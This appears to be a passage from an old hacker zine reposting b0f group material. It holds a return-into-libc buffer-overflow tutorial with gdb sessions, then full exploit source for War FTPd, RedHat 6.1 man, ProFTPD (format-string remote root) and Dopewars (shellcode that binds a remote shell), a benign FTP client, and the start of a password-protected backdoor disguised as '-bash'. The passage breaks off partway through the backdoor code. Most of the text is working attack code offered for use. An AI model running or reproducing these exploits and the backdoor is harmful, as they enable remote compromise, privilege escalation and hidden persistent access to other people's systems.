[gH] Alive as ever. [gH]

: pushl %ebp 0x8048595 : movl %esp,%ebp 0x8048597 : pushl $0x8049099 0x804859c : call 0x804857c 0x80485a1 : addl $0x4,%esp 0x80485a4 : movl %ebp,%esp 0x80485a6 : popl %ebp 0x80485a7 : ret End of assembler dump. (gdb) x/5bc 0x8049099 0x8049099 <_fini+25>: 102 'f' 117 'u' 98 'b' 97 'a' 114 'r' (gdb) disassemble foo Dump of assembler code for function foo: 0x804857c : pushl %ebp 0x804857d : movl %esp,%ebp 0x804857f : movl 0x8(%ebp),%eax 0x8048582 : pushl %eax 0x8048583 : pushl $0x8049088 0x8048588 : call 0x8048400 0x804858d : addl $0x8,%esp 0x8048590 : movl %ebp,%esp 0x8048592 : popl %ebp 0x8048593 : ret End of assembler dump. (gdb) quit darkstar:~/omega$ We notice the address of our "fubar" string getting pushed on the stack at 0x8048597. After that the foo function is called (0x804859c). After initialisation foo() loads the pushed address into the eax register as we can see at 0x804857f. The address is located on 0x8(%ebp), ebp is the current stack pointer. ---[ Implementation With the previous in mind we write a small test program. <++> omega/test.c /* * A small test program for project "omega" * Lamagra */ foo(char *bla) { printf("foo: %p\n",bla); printf("foo: %s \n",bla); } main() { char bla[8]; char *shell = "/bin/sh"; long addy = 0x41414141; printf("foo = 0x%x\n",(long)&foo); printf("bla = 0x%x\n",(long)&bla); printf("shell = 0x%x\n",shell); *(long *)&bla[0] = addy; /* buffer */ *(long *)&bla[4] = addy; /* buffer */ *(long *)&bla[8] = addy; /* saved ebp */ *(long *)&bla[12] = &foo; /* saved eip */ *(long *)&bla[16] = addy; /* Junk */ *(long *)&bla[20] = shell; /* address of the arg */ } <--> The comment explain the use pretty clear, so read them. Afterwards compile and run. darkstar:~/omega$ gcc test.c -otest darkstar:~/omega$ test foo = 0x804857c bla = 0xbffffb08 shell = 0x8049111 foo: 0x8049111 foo: /bin/sh segmentation fault darkstar:~/omega$ The foo function gets called and its argument is placed correctly. But after execution it segfaults, let's debug it and find out why. darkstar:~/omega$ gdb test GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-slackware-linux"... (gdb) break *foo Breakpoint 1 at 0x804857c (gdb) run Starting program: /tmp/omega/hello foo = 0x804857c bla = 0xbffffb10 shell = 0x8049111 Breakpoint 1, 0x804857c in foo () (gdb) x/10wx 0xbffffb10 0xbffffb10: 0x41414141 0x41414141 0x41414141 0x0804857c 0xbffffb20: 0x41414141 0x08049111 0xbffffb44 0x00000000 0xbffffb30: 0x00000000 0x00000000 (gdb) c Continuing. foo: 0x8049111 foo: /bin/sh Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info reg ebp ebp 0x41414141 0x41414141 (gdb) info reg esp esp 0xbffffb24 0xbffffb24 (gdb) quit The program is running. Exit anyway? (y or n) y darkstar:~/omega$ The dumb of buffer "bla" shows our intentions very clearly. The segfault happens because the program tries to execute 0x41414141. That address is at 0xbffffb20. When returning from foo() ebp and eip are poped from the stack at the location pointed to by esp. If we wanted to put right the segfault, we could put an other address in there (eg. exit()), so it has a clean exit. Apply this patch to fix it (patch test.c test.patch). <++> omega/test.patch --- old.c Wed Oct 6 18:49:07 1999 +++ test.c Wed Oct 6 18:49:25 1999 @@ -19,6 +19,6 @@ *(long *)&bla[4] = addr; /* buffer */ *(long *)&bla[8] = addr; /* saved ebp */ *(long *)&bla[12] = &foo; /* saved eip */ - *(long *)&bla[16] = addr; /* Junk */ + *(long *)&bla[16] = &exit; /* exit() */ *(long *)&bla[20] = shell; /* address of the arg */ } <--> Same thing can be done for multiple arguments. 0x8(%ebp) = arg[1] 0xc(%ebp) = arg[2] 0x10(%ebp) = arg[3] and so on. <++> omega/multiple.c #include #include main() { char bla[8]; char *shell = "/bin/sh"; long addr = 0x41414141; printf("bla = 0x%x\n",(long)&bla); printf("shell = 0x%x\n",shell); *(long *)&bla[0] = addr; /* buffer */ *(long *)&bla[4] = addr; /* buffer */ *(long *)&bla[8] = addr; /* saved ebp */ *(long *)&bla[12] = &execl; /* saved eip */ *(long *)&bla[16] = &exit; /* exit() */ *(long *)&bla[20] = shell; /* arg[1] */ *(long *)&bla[24] = shell; /* arg[2] */ *(long *)&bla[28] = 0x0; /* arg[3] */ /* * Executes execl("/bin/sh","/bin/sh",0x0); * On error exit("/bin/sh"); i know weird */ */ } <--> Now we can exploit a bufferoverflow in a secure environement. What about in the wild? <++> omega/hole.c /* * The hole program. * Prints the address of system() in libc and overflows. */ #include #include main(int argc, char **argv) { char buf[8]; long addr; void *handle; handle = dlopen(NULL,RTLD_LAZY); addr = (long)dlsym(handle,"system"); printf("System() is at 0x%x\n",addr); if(argc > 1) strcpy(buf, argv[1]); } <--> <++> omega/exploit.c /* * The exploit * Finds the address of system() in libc. * Searches for "/bin/sh" in the neighbourhood of system(). * (System() uses that string) * Lamagra */ #include #include main(int argc, char **argv) { int x,size; char *buf; long addr,shell,exitaddy; void *handle; if(argc != 3){ printf("Usage %s \n",argv[0]); exit(-1); } size = atoi(argv[1])+16; if((buf = malloc(size)) == NULL){ perror("can't allocate memory"); exit(-1); } handle = dlopen(NULL,RTLD_LAZY); addr = (long)dlsym(handle,"system"); printf("System() is at 0x%x\n",addr); if(!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || !(addr & 0xff000000)) { printf("system() contains a '0', sorry!"); exit(-1); } shell = addr; while(memcmp((void*)shell,"/bin/sh",8)) shell++; printf("\"/bin/sh\" is at 0x%x\n",shell); printf("print %s\n",shell); memset(buf,0x41,size); *(long *)&buf[size-16] = 0xbffffbbc; *(long *)&buf[size-12] = addr; *(long *)&buf[size-4] = shell; puts("Executing"); execl(argv[2],argv[2],buf,0x0); } <--> darkstar:~/omega$ gcc hole.c -ohole -ldl darkstar:~/omega$ gcc omega.c -oomega -ldl darkstar:~/omega$ omega 8 vun System() is at 0x40043a18 "/bin/sh" is at 0x40089d26 print /bin/sh Executing System() is at 0x40043a18 bash# Looks like it works. But as you may have noticed an extra library is linked for this methode. That's why it doesn't work on programs that don't have that library linked: because the location of system() is different. There are other methodes to get the correct address: o Changing the program to let it print out the address (more or less the same) o Getting the address from the ELF-headers. ( I think this doesn't work on stripped files, solution recompile) o getting the address of atexit() (always available) and calculate the address of system(). Check out included program. ---[ Extra <++> omega/calc.c #include #include main(int argc, char **argv) { long addy,diff; if (argc != 2) { printf("Usage: %s \n",argv[0]); printf("Get the address with GDB\n\t$ echo x atexit|gdb program\n"); exit(-1); } addy = strtoul(argv[1],0,0); printf("Input = 0x%x\n",addy); diff = (long)&atexit - (long)&system; printf("system() = 0x%x\n",addy - diff + 16); } <--> ---[ Reference my previous paper in corezine #2 (http://bounce.to/unah16) ---[EOF @HWA 29.0 warftpd.c exploit code from b0f ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://www.b0f.com/ /* coded by eth0 from buffer0verfl0w */ /* tested by morpha */ /* *NOTE* Original exploit was coded for winbl0wz *NOTE */ /* Vulnerable: War FTPd version 1.66x4 War FTPd version 1.67-3 Immune: War FTPd version 1.67-4 War FTPd version 1.71-0 The buffer overflow seems to occur because the bound check of the command of MKD/CWD is imperfect. This means that although anyone can overflow the statically assigned buffer that stores the requested path, you cannot overwrite the RET address and therefore it's impossible to cause War FTPd to execute arbitrary code. However, it is a simple mechanism for performing a Denial-of-Service against the server. Solution: War FTPd 1.70-1 does fix this problem, but it contains other vulnerabilities (see our additional information section). */ #include #include #include #include #include #include #include #include #include #define FTP_PORT 21 #define MAXBUF 8182 //#define MAXBUF 553 #define MAXPACKETBUF 32000 #define NOP 0x90 #define PASS "PASS eth0@owns.your.ass.com\r\n" #define LOGIN "USER anonymous\r\n" int expl0it(char *host) { struct hostent *hp; struct in_addr addr; struct sockaddr_in s; static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q; /* u_char buf[280]; */ int p, i; hp = gethostbyname (host); if (!hp) exit (1); bcopy (hp->h_addr, &addr, sizeof (struct in_addr)); p = socket (s.sin_family = 2, 1, IPPROTO_TCP); s.sin_port = htons (FTP_PORT); s.sin_addr.s_addr = inet_addr (inet_ntoa (addr)); if(connect (p, &s, sizeof (s))!=0) { printf("[%s:%s] <-- doesn't seem to be listening\n",host,FTP_PORT); return; } else { printf("Connected!\n"); write(p, LOGIN, strlen(LOGIN)); /* printf("Writing [%s] to server\n",LOGIN); */ write(p, PASS, strlen(PASS)); /* printf("Writing [%s] to server\n",PASS); */ memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0; sprintf((char *)packetbuf,"CWD %s\r\n",buf); send(p,(char *)packetbuf,strlen((char *)packetbuf),0); /* printf("Writing [%s] to server\n",packetbuf); */ printf("DONE!\n"); } return(0); } int main(int argc, char *argv[]) { if(argc<2) { printf("Usage: %s [host] \n",argv[0]); return; } else { expl0it(argv[1]); } return(0); } @HWA 30.0 FTPCAT 1.0 by lamagra (b0f) ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://www.b0f.com/ /* * FTPCAT v1.0 * * This is the first C++ example i wrote. If you have any comments on it * please mail me or use the form on my site. * * Ftpcat is a simple program, that allows users to upload and download * files and dirlistings from a ftpserver. Check usage for the commands. * * Have fun * * -lamagra (access-granted@geocities.com) * http://lamagra.seKure.de */ /* INCLUDES */ #include #include #include #include #include #include #include #include #include #include // inet_addr() #include // strerror() #include // isdigit() #include /* DEFINES */ #define ANON_PASS "Ftpcat@lamagra.seKure.de" /* PROTOCOLS + CLASSES */ void error_quit(char *msg,...); extern int errno; extern int optind; extern char *optarg; char *host, *user,*path; class ftp { int ftpsock; public: long port; int list; set_default(); connectto(char *host); login(char *user); disconnect(); unsigned long resolve(char *host); sendcmd(char *text, ...); int get_response(); int get_file(); int put_file(); int dataconn(); }; /* FUNCTIONS */ void error_quit(char *msg,...) { va_list va; va_start(va, msg); vfprintf(stderr, msg, va); va_end(va); exit(-1); } usage(char *progname) { printf("Ftpcat by lamagra (http://lamagra.seKure.de)\n"); printf( "Usage: %s [options] user@host:port/path/(file/dir)\n" "\t port is optional\n" "\t -h and -?: this text\n" "\t -l: show dir-contents\n" "\t -p: put a file\n" ); exit(0); } ftp::set_default() { port = 21, list = 0; } ftp::connectto(char *host) { struct sockaddr_in sin; sin.sin_addr.s_addr = resolve(host); sin.sin_port = htons(port); sin.sin_family = AF_INET; if((ftpsock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == -1) error_quit("Can't open socket: %s\n",strerror(errno)); if(connect(ftpsock,(struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1) error_quit("Can't connect to %s.%ld: %s\n",host,port,strerror(errno)); // fcntl(ftpsock,F_SETFL,O_NONBLOCK); } ftp::disconnect() { sendcmd("QUIT\r\n"); close(ftpsock); } ftp::login(char *user) { char *passwd; int gotpass = 0; if(!strcmp("ftp",user) || !strcmp("anonymous",user)) passwd = ANON_PASS; else /* Prompt user for password */ passwd = getpass("Please enter password: "),gotpass = 1; if(get_response() != 220) error_quit("No banner\n"); sendcmd("USER %s\r\n",user); if(get_response() != 331) error_quit("USER %s failed\n",user); sendcmd("PASS %s\r\n",passwd); if(get_response() != 230) error_quit("PASS **** failed\n"); if(gotpass) memset(passwd,0x0,strlen(passwd)); // zero passwd } unsigned long ftp::resolve(char *name) { struct hostent *hp; unsigned long ip; if((ip = inet_addr(name)) == -1) { if((hp = gethostbyname(name)) == NULL) { printf("Unable to resolve <%s>\n",name); exit(-1); } memcpy(&ip,hp->h_addr,4); } return ip; } ftp::sendcmd(char *text, ...) { va_list va; char buf[1024]; va_start(va,text); vsnprintf(buf,1024,text,va); va_end(va); if(buf[strlen(buf) - 1] != '\n') error_quit("Send: text doesn't end with \\n"); if(write(ftpsock, buf, strlen(buf)) == -1) error_quit("Write error: %s\n",strerror(errno)); } int ftp::get_response() { char response[4]; char tmp; int i = 0; while(read(ftpsock,(char *)&tmp,1) == 1) { response[i++] = tmp; if(i > 3) { if(response[3] != ' ' || !isdigit(response[0]) || !isdigit(response[1]) || !isdigit(response[2])) { while(read(ftpsock,(char *)&tmp,1) == 1 && tmp != '\n'); i = 0; } else { response[3] = 0x0; // error_quit("Server send bad response: %s\n",response); return atoi(response); } } } } int ftp::dataconn() { int fd; unsigned int len = sizeof(struct sockaddr); struct sockaddr_in sin; char *a, *b; if((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == -1) error_quit("Can't open socket: %s\n",strerror(errno)); /* Get the address from the ftpsock */ if(getsockname(ftpsock,(struct sockaddr *)&sin,&len) == -1) error_quit("Getsockname failed: %s\n",strerror(errno)); sin.sin_port = 0; if(bind(fd,(struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1) error_quit("Can't bind to port: %s",strerror(errno)); if(getsockname(fd,(struct sockaddr *)&sin,&len) == -1) error_quit("Getsockname failed: %s\n",strerror(errno)); listen(fd,1); a = (char *)&sin.sin_addr; b = (char *)&sin.sin_port; #define UC(x) (((int)x)&0xff) sendcmd("PORT %d,%d,%d,%d,%d,%d\r\n", UC(a[0]),UC(a[1]),UC(a[2]),UC(a[3]), UC(b[0]),UC(b[1])); if(get_response() != 200) error_quit("PORT failed\n"); sendcmd("TYPE I\r\n"); if(get_response() != 200) error_quit("TYPE failed\n"); return fd; } int ftp::get_file() { char *file; struct sockaddr_in sin; int clientfd; unsigned int len =sizeof(struct sockaddr); int fd = dataconn(); if(list) // Get dirlisting { sendcmd("CWD %s\r\n",path); if(get_response() != 250) error_quit("%s doesn't exist\n",path); sendcmd("LIST -al\r\n"); } else { if((file = (char *)strrchr(path,'/'))) { *file++ = 0x0; sendcmd("CWD %s\r\n",path); if(get_response() != 250) error_quit("%s doesn't exist\n",path); }else file = path; sendcmd("RETR %s\r\n",file); if(get_response() == 550) error_quit ("%s doesn't exist",file); } if((clientfd = accept(fd,(struct sockaddr *)&sin,&len)) == -1) error_quit("Accept() failed: %s\n",strerror(errno)); close(fd); // fcntl(ftpsock,F_SETFL,O_NONBLOCK); return clientfd; } int ftp::put_file() { int fd = dataconn(); struct sockaddr_in sin; int clientfd; unsigned int len = sizeof(struct sockaddr); char *file; if((file = (char *)strrchr(path,'/'))) { *file++ = 0x0; sendcmd("CWD %s\r\n",path); if(get_response() != 250) error_quit("%s doesn't exist\n",path); }else file = path; sendcmd("STOR %s\r\n",file); if(get_response() == 550) error_quit ("%s doesn't exist",file); if((clientfd = accept(fd,(struct sockaddr *)&sin,&len)) == -1) error_quit("Accept() failed: %s\n",strerror(errno)); close(fd); // fcntl(ftpsock,F_SETFL,O_NONBLOCK); return clientfd; } int ftpdecode(char *string,ftp *obj) { char *tmp; if((tmp = (char *)strchr(string,'/'))) *tmp = 0x0, path = ++tmp; else return -1; if((tmp = (char *)strchr(string,':'))) *tmp = 0x0, obj->port = atol(++tmp); if((tmp = (char *)strchr(string,'@'))) *tmp = 0x0, host = ++tmp; else return -1; user = string; return 0; } int main(int argc,char **argv) { ftp obj; char c, buf[1024]; int datafd, len, cmd = 0; obj.set_default(); while((c = getopt(argc,argv,"h?lp")) != EOF) { switch(c) { case 'h': case '?': usage(argv[0]); break; case 'l': obj.list = 1; break; case 'p': cmd = 1; break; case 'd': cmd = 2; default: error_quit("Unknown option: %c\n",c); } } if((argc - optind) != 1) usage(argv[0]); if(ftpdecode(argv[optind],&obj) == -1) error_quit("Bad user@host:port/path string\n"); obj.connectto(host); obj.login(user); if(!cmd) { datafd = obj.get_file(); while(len = read(datafd,buf,1024)) { if(len == -1) error_quit("Read() failed: %s\n",strerror(errno)); write(STDOUT_FILENO,buf,len); memset(buf,0x0,1024); } } else { datafd = obj.put_file(); printf("[ Ready for datainput ]\n"); while(len = read(STDIN_FILENO,buf,1024)) { if(len == -1) error_quit("Read() failed: %s\n",strerror(errno)); write(datafd,buf,len); memset(buf,0x0,1024); } } obj.disconnect(); return 0; } @HWA 31.0 Redhat 6.1 /usr/bin/man exploit. Gives egid=man by venglin (b0f) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://www.b0f.com/ /* * (c) 2000 babcia padlina / b0f * (lcamtuf's idea) * * redhat 6.1 /usr/bin/man exploit */ #include #include #include #include #define NOP 0x90 #define OFS 1800 #define BUFSIZE 4002 #define ADDRS 1000 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char *buf, *p; int noplen, i, ofs; long ret, *ap; if(!(buf = (char *)malloc(BUFSIZE+ADDRS+1))) { perror("malloc()"); return -1; } if (argc > 1) ofs = atoi(argv[1]); else ofs = OFS; noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); p = buf + noplen + strlen(execshell); ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf)); setenv("MANPAGER", buf, 1); execl("/usr/bin/man", "man", "ls", 0); return 0; } @HWA 32.0 Proftpd pre <=6 remote exploit for linuxppc by lamagra (b0f) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://www.b0f.com/ * Although marked 'private' this was available for public download on the b0f site - Ed /* PRIVATE Do not distribute PRIVATE oktober 1999 pro-ftpd remote exploit (linux ppc) Bug: Proftpd (<= pre6) passes user commands to snprinft(). snprintf(argv,len,command + host + etc); This makes it possible to insert formatstrings. %n: writes the number of chars written to the location pointed to by it's argument. Stack: [ user argument ] [ other stuff ] [ arguments + stack of the snprintf funtion + subfunctions ] We walk to all that garbage using %u and stop at a certain possition inside the usercommand. At that possition is the address that will be overwritten by %n. Exploit is simple we overwrite the uid and the anonconfig. After a uid change by LIST. We are root :-) Exploit: Linuxppc has a bad char (newline) in the address of session.anonconfig. This is why I overwrite DenyAll inside the config, But this area in memory is allocated and therefore unpredictable on a remote box. This is needed to get write access on the server (within the chroot-env). o Anonymous login: you can overwrite anything in /home/ftp. Getting out of the chroot-enviroment is impossible since proftpd doesn't use external program (to overwrite). hint: use .forward in combination with a suid file. o Local login: instant root by changing permission to suid. hint: SITE CHMOD 6755 (is allowed in proftpd, not in wuftpd) I plugged this exploit in the ftp program, because this program doesn't have data-connection support. Because it's not really needed. I used this bug to get root on linuxppc but they never gave me credit for it. I made a x86 exploit too, but i don't have any rpm-addy's. Only my testing vals. I heard RH6.x comes with proftpd, anyone wanna let me get the addy's? mail me. Greets to grue, lockdown, DryGrain by lamagra http://lamagra.seKure.de http://penguin.seKure.de */ #include #include #include #include #include #define NUM 150 #define DEFAULT_OFFSET 0 unsigned long resolve(char *); void usage(char *); void wait_msg(int); void ftplogin(int, char *, char *); void shell(int); extern char *optarg; extern int optind; void main(int argc, char **argv) { struct sockaddr_in addr; int sockfd,i; long port=21,*addrptr; char c, name[100],pass[100],buf[1024]; /* SET DEFAULTS */ strcpy(name,"ftp"); strcpy(pass,"h@ck.er"); while((c = getopt(argc,argv,"hn:p:c:")) != EOF) { switch(c) { case 'h': usage(argv[0]); case 'n': strncpy(name,optarg,100); break; case 'p': strncpy(pass,optarg,100); break; case 'c': port = atol(optarg); } } if((argc - optind) != 1) usage(argv[0]); bzero(&addr, sizeof(struct sockaddr_in)); addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = resolve(argv[optind++]); printf("Connecting....."); if((sockfd = socket(AF_INET,SOCK_STREAM,0)) == -1) { printf("failed\n"); perror("socket"); exit(-1); } if(connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("failed\n"); perror("connect"); exit(-1); } #ifdef DEBUG sockfd = fileno(stdout); #endif wait_msg(sockfd); printf("success\n"); printf("Logging in <%s>:<%s>\n",name,pass); ftplogin(sockfd,name,pass); strcpy(buf,"PWD aaaa"); /* Overwrite config to allow writing * 0x0187e608: session.anon_config, bad char in 0x0187e60a * DenyAll is at 0x1885f01 on the box i used for testing * It just fucks up the string -> DenyAll isn't found -> default is AllowAll */ buf[8] = 0x01; buf[9] = 0x88; buf[10] = 0x5f; buf[11] = 0x01; /* session.disable_idswithing is at 0x187e5ca */ buf[12] = 0x01; buf[13] = 0x87; buf[14] = 0xe5; buf[15] = 0xca; /* Ugly, Ugly / didn't feel like counting :-) */ strncpy(buf+16,"%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u",NUM); strcpy(buf+16+NUM,"%n%n\r\n"); write(sockfd,buf,strlen(buf)); sleep(1); /* 0x0187e5cc: session.uid*/ buf[8] = 0x01; buf[9] = 0x87; buf[10] = 0xe5; buf[11] = 0xcc; buf[12] = 0x01; buf[13] = 0x87; buf[14] = 0xe5; buf[15] = 0xce; write(sockfd,buf,strlen(buf)); /* 0x187e5d0: session.ouid */ buf[8] = 0x01; buf[9] = 0x87; buf[10] = 0xe5; buf[11] = 0xd0; buf[12] = 0x01; buf[13] = 0x87; buf[14] = 0xe5; buf[15] = 0xd2; write(sockfd,buf,strlen(buf)); /* LIST switches uid to session.ouid to bind to port 20 (ftp-data - privelidged port) */ write(sockfd,"LIST\r\n",6); /* LIST returns error "No data connection" */ do{ read(sockfd,buf,sizeof(buf)); }while(strstr(buf,"connection") == NULL); printf("Opening shell-connection\n"); shell(sockfd); printf("THE END\n"); close(sockfd); } void shell(int sockfd) { char buf[1024]; fd_set set; int len; while(1) { FD_SET(fileno(stdin),&set); FD_SET(sockfd,&set); select(sockfd+1,&set,NULL,NULL,NULL); if(FD_ISSET(fileno(stdin),&set)) { memset(buf,NULL,1024); fgets(buf,1024,stdin); write(sockfd,buf,strlen(buf)); } if(FD_ISSET(sockfd,&set)) { memset(buf,NULL,1024); if((len = read(sockfd,buf,1024)) == 0) { printf("EOF.\n"); exit(-1); } if(len == -1) { perror("read"); exit(-1); } puts(buf); } } } void ftplogin(int sockfd, char *user,char *passwd) { char send[500]; memset(send,NULL,500); snprintf(send,500,"USER %s\r\n",user); write(sockfd,send,strlen(send)); wait_msg(sockfd); memset(send,NULL,500); snprintf(send,500,"PASS %s\r\n",passwd); write(sockfd,send,strlen(send)); wait_msg(sockfd); return; } void wait_msg(int sockfd) { char c; while(read(sockfd,(char *)&c,sizeof(char)) > 0) { if(c == '\n') break; } } unsigned long resolve(char *hostname) { struct hostent *hp; unsigned long ip; if((ip = inet_addr(hostname)) == -1) { if((hp = gethostbyname(hostname)) == NULL) { printf("Can't resolve hostname <%s>.\n",hostname); exit(-1); } memcpy(&ip,hp->h_addr,4); } return ip; } void usage(char *name) { printf("Usage: %s [-n name] [-p pass] [-c port]\n",name); exit(-1); } @HWA 33.0 Dopewars 1.4.4 remote exploit for server and client by lamagra (b0f) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://www.b0f.com/ * Although marked 'private' this was available for public download on the b0f site - Ed /* PRIVATE Do NOT Distribute PRIVATE */ #include #include #include #include #include /* * Dopewars by Ben Webb (Version 1.4.4 maybe older ones too). * This exploit will cause a shell to be created on port 46256. * The bug in located inside the ProcessMessage() and ExtractWordDelim() * functions. * Lamagra */ char hellshell[]= "\x55\x89\xe5\xb2\x66\x89\xd0\x31\xc9" "\x89\xcb\x43\x89\x5d\xf8\x43\x89\x5d\xf4\x4b\x89" "\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89\x45\xf4" "\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\xb4\xb0\x89" "\x4d\xf0\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10" "\x89\xd0\x8d\x4d\xf4\xcd\x80\x89\xd0\x43\x43\xcd" "\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9\xb2\x3f" "\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41" "\xcd\x80\xc7\x45\xe8\x2f\x62\x69\x6e\x66\xc7\x45" "\xec\x2f\x73\xc6\x45\xee\x68\x31\xc9\x88\x4d\xef" "\xb0\x0b\x8d\x5d\xe8\x89\x5d\xe0\x8d\x4d\xe0\x31" "\xd2\x89\x55\xe4\xcd\x80"; char jmpcode[]="\xeb\x0d"; int shell(unsigned long); void transfer(char *, int); void do_expl(int,int,long); unsigned long resolve(char *); main(int argc, char **argv) { int time,offset=0,client,fd; struct sockaddr_in addr, clientaddr; long eip = 0xbffff620; if(argc < 2) { printf("Usage: %s {[-b] [offset]} {[hostname] [offset]}\n",argv[0]); exit(-1); } if(argc > 2) { if(!strncmp(argv[2],"0x",2)) eip = strtoul(argv[2],0,0); else offset = atoi(argv[2]); } fd = socket(AF_INET,SOCK_STREAM,0); addr.sin_family = AF_INET; addr.sin_port = htons(7902); if(strcmp(argv[1],"-b")) { addr.sin_addr.s_addr = resolve(argv[1]); for(time = 0;time < 20;time++) { /* Connect to server */ while(connect(fd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1) { perror("can't connect to server"); memset(addr.sin_zero,NULL,sizeof(addr.sin_zero)); sleep(20); } do_expl(fd,offset,eip); sleep(1); shell(addr.sin_addr.s_addr); offset += 100; /* increase offset and try again */ } } else{ /* bind to 7902 and wait for a client */ addr.sin_addr.s_addr = INADDR_ANY; if(bind(fd,(struct sockaddr *)&addr,16) == -1) { perror("bind"); exit(-1); } listen(fd,5); bzero((char*)&clientaddr,sizeof(struct sockaddr_in)); client = accept(fd,&clientaddr,16); do_expl(client,offset,eip); sleep(1); shell(clientaddr.sin_addr.s_addr); } close(fd); } void do_expl(int fd,int offset, long addy) { char buf[1024],*sploit; char nops[213]; int x; long *addr_ptr; /* check eip for 0x0 */ if(!(addy+offset & 0xff) || !(addy+offset & 0xff00) || !(addy+offset & 0xff0000) || !(addy+offset & 0xff000000)) { printf("NULL detected in address\n"); offset += 1; } sploit = nops; for(x = 0;x < 200 - strlen(jmpcode);x++) *(sploit++) = 0x90; for(x = 0;x < strlen(jmpcode);x++) *(sploit++) = jmpcode[x]; printf("Using address: 0x%x\n",addy+offset); addr_ptr = (long *)(sploit++); for(x = 0; x < 12;x+=4) *(addr_ptr++) = addy + offset; sprintf(buf,"%s^%s^%s\n",nops,nops, hellshell); write(fd,buf,strlen(buf)); } int shell(unsigned long addy) { char buf[1024]; fd_set set; int len,sockfd; struct sockaddr_in addr; addr.sin_family = AF_INET; addr.sin_port = htons(46256); addr.sin_addr.s_addr = addy; sockfd = socket(AF_INET,SOCK_STREAM,0); if(connect(sockfd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1) { perror("Sploit failed, connect"); close(sockfd); return -1; } strcpy(buf,"cd /;id;echo \"hehe success, don't do anything nasty\"\n"); write(sockfd,buf,strlen(buf)); while(1) { FD_SET(fileno(stdin),&set); FD_SET(sockfd,&set); select(sockfd+1,&set,NULL,NULL,NULL); if(FD_ISSET(fileno(stdin),&set)) { memset(buf,NULL,1024); fgets(buf,1024,stdin); write(sockfd,buf,strlen(buf)); } if(FD_ISSET(sockfd,&set)) { memset(buf,NULL,1024); if((len = read(sockfd,buf,1024)) == 0) { printf("EOF.\n"); close(sockfd); exit(-1); } if(len == -1) { perror("read"); exit(-1); } puts(buf); } } } unsigned long resolve(char *name) { struct hostent *hp; unsigned long ip; if((ip = inet_addr(name)) == -1) { if((hp = gethostbyname(name)) == NULL) { printf("Unable to resolve <%s>\n",name); exit(-1); } memcpy(&ip,hp->h_addr,4); } return ip; } @HWA 34.0 Simple Backdoor. Shell on a port with password support by eth0 (b0f) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://www.b0f.com/ * Although marked 'private' this was available for public download on the b0f site - Ed /* private backdoor for b0f */ /* coded by eth0 */ #include #include #include #include #include #include #include #include #define PASSAUTH 1 /* undefine this is you won't want a password at the beginning */ #define PORT 1337 /* define this to whatever you want */ #define MSG_WELCOME "[b0f] backd00r, remember that all commands are followed by a ;\n" #define MSG_PASSWORD "Password: " #define MSG_WRONGPASS "Invalid password\n" #define MSG_OK "Welcome...\n" #define MSG_CONTINUE "Do you want to continue?\n" #define HIDE "-bash" #define SHELL "/bin/sh" #ifdef PASSAUTH #define PASSWD "app910h" #endif int main (int argc, char *argv[]); #ifdef PASSAUTH int 